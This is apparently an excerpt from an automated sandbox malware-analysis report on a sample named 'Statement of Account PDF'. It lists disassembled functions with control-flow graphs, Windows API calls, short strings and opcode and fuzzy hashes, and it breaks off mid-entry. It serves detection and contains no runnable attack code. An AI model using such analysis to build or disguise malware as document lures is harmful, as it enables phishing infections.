                                                        Uniqueness Score: -1.00%

                                                        Function 06CE9D48 Relevance: 2.6, Strings: 2, Instructions: 150COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1147 6ce9d48-6ce9d53 1149 6ce9d59-6ce9d5a 1147->1149 1150 6ce9fb2-6cea188 call 6ce9498 1147->1150 1149->1150 1162 6cea189-6cea196 1150->1162 1163 6cea1a0-6cea1ac call 74a6688 1162->1163 1164 6cea1b2-6cea276 1163->1164 1167 6cea1dd-6cea296 1164->1167 1168 6cea1c3-6cea27f 1164->1168 1173 6cea2a0-6cea2a9 1167->1173 1168->1162 1171 6cea285-6cea286 1168->1171 1177 6cea20c-6cea212 call 74a6808 1171->1177 1175 6cea2b2-6cea2b3 1173->1175 1175->1168 1178 6cea218-6cea2d3 1177->1178 1184 6cea305 1178->1184 1185 6cea2d5-6cea304 1178->1185 1187 6cea306 1184->1187 1185->1184 1187->1187
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q$Te^q
                                                        • API String ID: 0-3743469327
                                                        • Opcode ID: 0392d2ecb07072db1bb981ff5f505f716d597ce93891f479dc1548dbd2c35014
                                                        • Instruction ID: 5fdfa7ad9a619adb954ab35d2399af987f9efc5be51d1d97f551bd70a8fc64a3
                                                        • Opcode Fuzzy Hash: 0392d2ecb07072db1bb981ff5f505f716d597ce93891f479dc1548dbd2c35014
                                                        • Instruction Fuzzy Hash: 5C51D674E09208CFDB54DFA9D844BEDBBB6FB49300F206159E54AA7385DB349A44CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00F1BCB8 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1193 f1bcb8-f1bcd7 1194 f1bd03-f1bd07 1193->1194 1195 f1bcd9-f1bce6 call f1921c 1193->1195 1197 f1bd09-f1bd13 1194->1197 1198 f1bd1b-f1bd5c 1194->1198 1202 f1bce8 1195->1202 1203 f1bcfc 1195->1203 1197->1198 1204 f1bd69-f1bd77 1198->1204 1205 f1bd5e-f1bd66 1198->1205 1250 f1bcee call f1bf60 1202->1250 1251 f1bcee call f1bf50 1202->1251 1203->1194 1206 f1bd79-f1bd7e 1204->1206 1207 f1bd9b-f1bd9d 1204->1207 1205->1204 1209 f1bd80-f1bd87 call f1b66c 1206->1209 1210 f1bd89 1206->1210 1212 f1bda0-f1bda7 1207->1212 1208 f1bcf4-f1bcf6 1208->1203 1211 f1be38-f1bef8 1208->1211 1216 f1bd8b-f1bd99 1209->1216 1210->1216 1243 f1bf00-f1bf2b GetModuleHandleW 1211->1243 1244 f1befa-f1befd 1211->1244 1213 f1bdb4-f1bdbb 1212->1213 1214 f1bda9-f1bdb1 1212->1214 1217 f1bdc8-f1bdd1 call f1b67c 1213->1217 1218 f1bdbd-f1bdc5 1213->1218 1214->1213 1216->1212 1224 f1bdd3-f1bddb 1217->1224 1225 f1bdde-f1bde3 1217->1225 1218->1217 1224->1225 1226 f1be01-f1be05 1225->1226 1227 f1bde5-f1bdec 1225->1227 1248 f1be08 call f1c260 1226->1248 1249 f1be08 call f1c230 1226->1249 1227->1226 1229 f1bdee-f1bdfe call f1b68c call f1b69c 1227->1229 1229->1226 1230 f1be0b-f1be0e 1233 f1be31-f1be37 1230->1233 1234 f1be10-f1be2e 1230->1234 1234->1233 1245 f1bf34-f1bf48 1243->1245 1246 f1bf2d-f1bf33 1243->1246 1244->1243 1246->1245 1248->1230 1249->1230 1250->1208 1251->1208
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00F1BF1E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1697899463.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f10000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 441563b5fb676b2b7b079125278fcbf0c5f2b771fa97f1f585bc1b4cfad0f32e
                                                        • Instruction ID: 44ea33b5307de3728111786c6a176446bfb121c05dbf0c189077e22502d1ac35
                                                        • Opcode Fuzzy Hash: 441563b5fb676b2b7b079125278fcbf0c5f2b771fa97f1f585bc1b4cfad0f32e
                                                        • Instruction Fuzzy Hash: 78812370A00B05CFD728DF29D45579ABBF1BF88314F008A2DD486DBA50DB35E985DB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00F14538 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1252 f14538-f15dd9 CreateActCtxA 1255 f15de2-f15e3c 1252->1255 1256 f15ddb-f15de1 1252->1256 1263 f15e4b-f15e4f 1255->1263 1264 f15e3e-f15e41 1255->1264 1256->1255 1265 f15e51-f15e5d 1263->1265 1266 f15e60 1263->1266 1264->1263 1265->1266 1268 f15e61 1266->1268 1268->1268
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 00F15DC9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1697899463.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f10000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: d856111a8fbc8a897b07719a8676da92783b88bf160a3a15965e68dc75811357
                                                        • Instruction ID: 11d28b16160d636c0b04cc3ca6400898d76894a3b1299de8ee8d98386e360d2e
                                                        • Opcode Fuzzy Hash: d856111a8fbc8a897b07719a8676da92783b88bf160a3a15965e68dc75811357
                                                        • Instruction Fuzzy Hash: 9D41D1B0C00719CBDB24CFA9C844BDEBBF5BF88704F24806AD408AB255DB756985CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00F15D0D Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1269 f15d0d-f15dd9 CreateActCtxA 1271 f15de2-f15e3c 1269->1271 1272 f15ddb-f15de1 1269->1272 1279 f15e4b-f15e4f 1271->1279 1280 f15e3e-f15e41 1271->1280 1272->1271 1281 f15e51-f15e5d 1279->1281 1282 f15e60 1279->1282 1280->1279 1281->1282 1284 f15e61 1282->1284 1284->1284
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 00F15DC9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1697899463.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f10000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: ca0dce40dd70432b276ddb573b456f38c4a3d8ad45ad4ac64a474c862ebffe3b
                                                        • Instruction ID: 990253a494a7f95846a0c619aa2cc9a6a365270818b047e1b952e411c01ad0e1
                                                        • Opcode Fuzzy Hash: ca0dce40dd70432b276ddb573b456f38c4a3d8ad45ad4ac64a474c862ebffe3b
                                                        • Instruction Fuzzy Hash: 1741CCB0C00619CFDB24CFA9C9846DDBBB6BF88704F24816AD408AB255DB756986CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CC9ED8 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DrawTextExW.USER32(?,?,?,?,?,?), ref: 06CC9F77
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707322732.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6cc0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID: DrawText
                                                        • String ID:
                                                        • API String ID: 2175133113-0
                                                        • Opcode ID: 13cc90e52ba94fdac1b28e366674fd3f80e13a570da28d50b9e302434282cbb2
                                                        • Instruction ID: 465deca57d2e3f23604afc088afd5b5ccf9d987ffd7d0ce94626777537101e33
                                                        • Opcode Fuzzy Hash: 13cc90e52ba94fdac1b28e366674fd3f80e13a570da28d50b9e302434282cbb2
                                                        • Instruction Fuzzy Hash: BF31E0B5D002099FDB10CF9AD880ADEBBF5FB48324F14842EE819A7210D775AA45CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CC9EE0 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DrawTextExW.USER32(?,?,?,?,?,?), ref: 06CC9F77
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707322732.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6cc0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID: DrawText
                                                        • String ID:
                                                        • API String ID: 2175133113-0
                                                        • Opcode ID: bae1f91370fc02edc92f5c0474328c1a595cb1b283a8dc1141ad1b8287af353e
                                                        • Instruction ID: 833bc8dc625dd975c94777f52987b05eb0683ef504916b9e39bcbfa5f0a09dcc
                                                        • Opcode Fuzzy Hash: bae1f91370fc02edc92f5c0474328c1a595cb1b283a8dc1141ad1b8287af353e
                                                        • Instruction Fuzzy Hash: 9E21CEB5D002499FDB10CF9AD884A9EBBF4BB48320F14842EE819A7210D775A944CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00F1DAF0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00F1E16E,?,?,?,?,?), ref: 00F1E22F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1697899463.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f10000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 9a13237f5c6c62721d81d45a105d724543e8bcf3a19ce5a3c2994f9d107a5451
                                                        • Instruction ID: a426fe2f64a71d1c4c4e0ffcdc1aa54eedca1278f3a2a7f962e7b09074eb1261
                                                        • Opcode Fuzzy Hash: 9a13237f5c6c62721d81d45a105d724543e8bcf3a19ce5a3c2994f9d107a5451
                                                        • Instruction Fuzzy Hash: F021D2B5D00248AFDB10CF9AD584AEEBBF8EB48320F14841AE958A7310D375A944DFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00F1E1A0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00F1E16E,?,?,?,?,?), ref: 00F1E22F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1697899463.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f10000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: cd76be804cb80cc515e351bcd571bd7f7e1f5adf3a17176eda3dedce3c21b485
                                                        • Instruction ID: c2f525d2c4eed8ed96db3349f08143398ad2caab3f6543ba6f904f1e733a8ca0
                                                        • Opcode Fuzzy Hash: cd76be804cb80cc515e351bcd571bd7f7e1f5adf3a17176eda3dedce3c21b485
                                                        • Instruction Fuzzy Hash: B721E4B5D00248DFDB10CF99D584ADEBBF9FB48320F14841AE958A7260C774A954DFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00F1B6C8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F1BF99,00000800,00000000,00000000), ref: 00F1C1AA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1697899463.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f10000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 5a5339d67f89cf2a13ea0322474c5fa811d7943719abd4d47ece497854c563cd
                                                        • Instruction ID: 318721faef43b827095ec68b68a4125b7a6eba1cbe7ca6424229968c73aa5750
                                                        • Opcode Fuzzy Hash: 5a5339d67f89cf2a13ea0322474c5fa811d7943719abd4d47ece497854c563cd
                                                        • Instruction Fuzzy Hash: 481114B6D003499FDB10CF9AD444ADEFBF4EB48320F10842AE519B7211C375A945CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00F1C138 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F1BF99,00000800,00000000,00000000), ref: 00F1C1AA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1697899463.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f10000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 9ba323716c97c5f84637095127c52754b59b413acbccef7d955912a52f4a1532
                                                        • Instruction ID: d1f14ba8e312d35c453cadc6c8d6f697835d488ab6e8535bb377f30382e1476d
                                                        • Opcode Fuzzy Hash: 9ba323716c97c5f84637095127c52754b59b413acbccef7d955912a52f4a1532
                                                        • Instruction Fuzzy Hash: F71142B6D00309DFDB14CF9AC584ADEFBF4AB48320F10842AD419B7210C775A945CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEC990 Relevance: 1.5, Strings: 1, Instructions: 299COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (bq
                                                        • API String ID: 0-149360118
                                                        • Opcode ID: 6a9a6f376efce1e2ad299c42cdf01c37e52f58e283821ec77571b069d76a0d07
                                                        • Instruction ID: 2720ee54810469cecd17b5b766f79f020db6d19513b1d162b0147639b6412f3c
                                                        • Opcode Fuzzy Hash: 6a9a6f376efce1e2ad299c42cdf01c37e52f58e283821ec77571b069d76a0d07
                                                        • Instruction Fuzzy Hash: D191F070A01248DFDB14DFBAE4446EEBFF2FF89314F20846AE455A7251DB34A842CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00F1BEB8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00F1BF1E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1697899463.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f10000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 84a39345508385bb1bf3555139114ae23fa41a322766f7f29bb935b9ef39062f
                                                        • Instruction ID: 876cd1d46be3430ec996f1782ef80a51cae4108bf2f622148b612a0d24e4bdf1
                                                        • Opcode Fuzzy Hash: 84a39345508385bb1bf3555139114ae23fa41a322766f7f29bb935b9ef39062f
                                                        • Instruction Fuzzy Hash: 3111E0B6D00349CFCB10CF9AD844ADEFBF5AF88324F14846AD459A7210C375A585CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE2F10 Relevance: 1.4, Strings: 1, Instructions: 193COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Hbq
                                                        • API String ID: 0-1245868
                                                        • Opcode ID: 76da77d8ae1ba1a79250f8b186a570b67d19ab9230b539c68694f313bcce50f3
                                                        • Instruction ID: dac426b8443721f25230b6a5a46d0965295b5076ad151a262c77c10a500a0463
                                                        • Opcode Fuzzy Hash: 76da77d8ae1ba1a79250f8b186a570b67d19ab9230b539c68694f313bcce50f3
                                                        • Instruction Fuzzy Hash: E461CF30B002489FCB58EB78C45466E7BBAEFC5311B2485ADD409DB391CE39EE46CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE4B48 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Hbq
                                                        • API String ID: 0-1245868
                                                        • Opcode ID: 5cacdfb5705894614a60ef9a956bcf78a1d45b54ca699c95d6e6ea65467f13a9
                                                        • Instruction ID: d79f87c3450f305b3b35a4e16f5faa2291b2ae7c37d668735703e075cccce768
                                                        • Opcode Fuzzy Hash: 5cacdfb5705894614a60ef9a956bcf78a1d45b54ca699c95d6e6ea65467f13a9
                                                        • Instruction Fuzzy Hash: 954152367001149BD705AFBA98906BF7B9BEBC5351B118425E906CB3D5EE38DC42C3E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE39B0 Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PH^q
                                                        • API String ID: 0-2549759414
                                                        • Opcode ID: fbbd5a30c49a4454b071afe16218ee65b8792f2011c133c451935084ca107555
                                                        • Instruction ID: 489059f98a014acdb7e0579d000fcbada1f4b6658a6406b62f4399d0309f275a
                                                        • Opcode Fuzzy Hash: fbbd5a30c49a4454b071afe16218ee65b8792f2011c133c451935084ca107555
                                                        • Instruction Fuzzy Hash: EE516730B405458FDB58DF69C998BAAB7F1FF88700F1481A9E40ADB260DB71ED85CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE3991 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PH^q
                                                        • API String ID: 0-2549759414
                                                        • Opcode ID: 84ae90d70e2070281b8c599f817a074cb47053ca05f73f75ef0fe62a9b522b9c
                                                        • Instruction ID: 915c68337a9fa312dbe1aea42d7cd355f92872926cde5da86af14f9c93a84c6d
                                                        • Opcode Fuzzy Hash: 84ae90d70e2070281b8c599f817a074cb47053ca05f73f75ef0fe62a9b522b9c
                                                        • Instruction Fuzzy Hash: 9B516830B405458FDB58CF69C998BA9B7F1BF88704F1581A9E40ADB261CB71ED85CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEAED8 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Hbq
                                                        • API String ID: 0-1245868
                                                        • Opcode ID: f67efb9b0c9abdd0909efc47066be76b6fea46972eee637b1211da479ba4f6df
                                                        • Instruction ID: 82e188a0daeeb9205957ce8a53c06c413afdfb6720c3ab962ff83871efba5850
                                                        • Opcode Fuzzy Hash: f67efb9b0c9abdd0909efc47066be76b6fea46972eee637b1211da479ba4f6df
                                                        • Instruction Fuzzy Hash: F6311634A00209AFDB04EFA5D8549DEBBB6FFC9304B108529E502AB395DF74AD46CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE3B8C Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (bq
                                                        • API String ID: 0-149360118
                                                        • Opcode ID: 0751db26892e54626f6f1a0986f238095a62340543758d2c169d3fc9eb0f6fbe
                                                        • Instruction ID: 1687b7acf88abf5a8b42458ef06146f4f1b105ce4e697487388b1cc2523d3d31
                                                        • Opcode Fuzzy Hash: 0751db26892e54626f6f1a0986f238095a62340543758d2c169d3fc9eb0f6fbe
                                                        • Instruction Fuzzy Hash: 334191307006508FC7A4AB38C848B567BB1BF85314F1586ADE45ECB3A1CF74E98ACB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 074AC350 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: O};5
                                                        • API String ID: 0-3558557551
                                                        • Opcode ID: 1375168a7ecf720d0081fad4ac9ad0dc6101a3c0cfcfc663c60ab131599f1b1c
                                                        • Instruction ID: 66b4cc7e3b0928240042b6d79b02d2a5c389a49153297e9e68c5a2e4b81434c6
                                                        • Opcode Fuzzy Hash: 1375168a7ecf720d0081fad4ac9ad0dc6101a3c0cfcfc663c60ab131599f1b1c
                                                        • Instruction Fuzzy Hash: 28411DB0E15609EFCB84CF99D5849AEBBF2FF89300F609896D456A7314D730EA11CB25
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CEF208 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q
                                                        • API String ID: 0-671973202
                                                        • Opcode ID: e91531cee8839502cc3fca620e7f059d209ebe2497ccdaeb9eea55ca86367001
                                                        • Instruction ID: 1b78a04022deff786402e170df217a2ff95d7f01b2fa2d8015eb5152edc815f2
                                                        • Opcode Fuzzy Hash: e91531cee8839502cc3fca620e7f059d209ebe2497ccdaeb9eea55ca86367001
                                                        • Instruction Fuzzy Hash: BF312DB4E042888FDB54CFA6C4546EEBFB6BF89300F14802ED415AB365DB745945CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE69A9 Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (bq
                                                        • API String ID: 0-149360118
                                                        • Opcode ID: 8ff11a84f07d08eec1b9cfbcb34ca106e689a040dc1feea730e1b881b3c6cf5c
                                                        • Instruction ID: cd8d6abfe1628eb9b4caebc5d1d9572fe7244084787eb55b94c65039268b279a
                                                        • Opcode Fuzzy Hash: 8ff11a84f07d08eec1b9cfbcb34ca106e689a040dc1feea730e1b881b3c6cf5c
                                                        • Instruction Fuzzy Hash: EE217B71D0A691AFD329DF39C0001B9BFB0FF91344B44816BC4988BA93DA34B996D7D2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CEF218 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q
                                                        • API String ID: 0-671973202
                                                        • Opcode ID: 5419e00b85cfc409d85c166033f331a774ac5f5f74424f31edee50805ee9bb8b
                                                        • Instruction ID: 849af1ec251f128d5f8c28bc7826ca0c283e4752f2f8aa4f4df2ab2cf270fd90
                                                        • Opcode Fuzzy Hash: 5419e00b85cfc409d85c166033f331a774ac5f5f74424f31edee50805ee9bb8b
                                                        • Instruction Fuzzy Hash: 4931F6B4E042488FDB58CFAAC5546EEBBB6AF89300F108029D419AB358DB745906CF80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 074ADDE0 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8bq
                                                        • API String ID: 0-187764589
                                                        • Opcode ID: 7d2ce76ec6b95cbf4fc965e30d5f0f35937119f726ab72f87c487a67eac7100b
                                                        • Instruction ID: 6ea3e4238fab066f6a9abab825d488d065002409edff5167ef458c94b07c3ec6
                                                        • Opcode Fuzzy Hash: 7d2ce76ec6b95cbf4fc965e30d5f0f35937119f726ab72f87c487a67eac7100b
                                                        • Instruction Fuzzy Hash: D1312DB4E04109DFCB48DFA9D9406EFBBB6FBA9300F10952AD516A7395DB345A01CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CEB982 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8bq
                                                        • API String ID: 0-187764589
                                                        • Opcode ID: 17c581ca48762266f91a6c9d2a1f834d9dcffa085cb582d1488cdaba8d7b44c1
                                                        • Instruction ID: ed93b59973868b6bddd95c9d7a3ab6e6374cef48a94e6421657ee872169390f3
                                                        • Opcode Fuzzy Hash: 17c581ca48762266f91a6c9d2a1f834d9dcffa085cb582d1488cdaba8d7b44c1
